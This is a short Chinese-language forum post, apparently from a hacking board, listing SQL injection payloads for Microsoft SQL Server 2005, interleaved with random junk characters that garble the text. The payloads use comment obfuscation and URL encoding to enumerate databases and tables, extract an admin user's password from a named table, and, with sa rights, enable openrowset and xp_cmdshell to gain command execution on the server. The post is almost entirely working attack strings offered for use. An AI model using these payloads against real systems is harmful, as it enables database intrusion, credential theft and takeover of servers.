MSsql2005注入语句

admin

# c) U& S6 T) J
/ U8 @2 i$ J  s  ]- p
[Copy to clipboard]CODE:
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--

- N6 I' f: _6 o5 i: D& v爆表语句,somedb部份是所要列的数据库，红色数字1累加
  h* z8 ]1 K( H, Z

[Copy to clipboard]CODE:
6 S' {3 y6 Z" m6 ~9 _/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--

爆字段语句，爆表admin里user='icerover'的密码段
" ]" v! ~& ]. p4 G, \7 r4 a
2 d0 f9 X0 b  J$ F* S
% B$ @6 R. \9 {[Copy to clipboard]CODE:
9 Y5 g; K" e+ t* r- V4 ^$ i**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
$ W3 J: C: ^: ?0 \  E
3 R! t3 F* |' x* I; `mssql2005默认没有开xp_cmdshell的，openrowset也不能用
% j' i/ |9 y8 u! _) ~如果是sa权限，可以这样来开启
# ]- _  S6 G7 z1 t7 A* k, G* A开启openrowset
6 j5 S/ E* |/ W; S
! x1 Z7 G' h4 L1 t( T
[Copy to clipboard]CODE:
8 }- T$ [+ Q9 v( d1 T/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
1 z; v% f: o) {5 W7 ?7 B: Q4 z/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--

9 [# A3 [0 z  p1 @开启xp_cmdshell

0 s6 ]* r/ v' S
[Copy to clipboard]CODE:
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
% B+ s9 }$ t/ h/ r* V- }EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
$ g3 [8 g8 O: ?9 p7 h
ok,over~~晚安
( [$ k! l" \4 I) b' d: d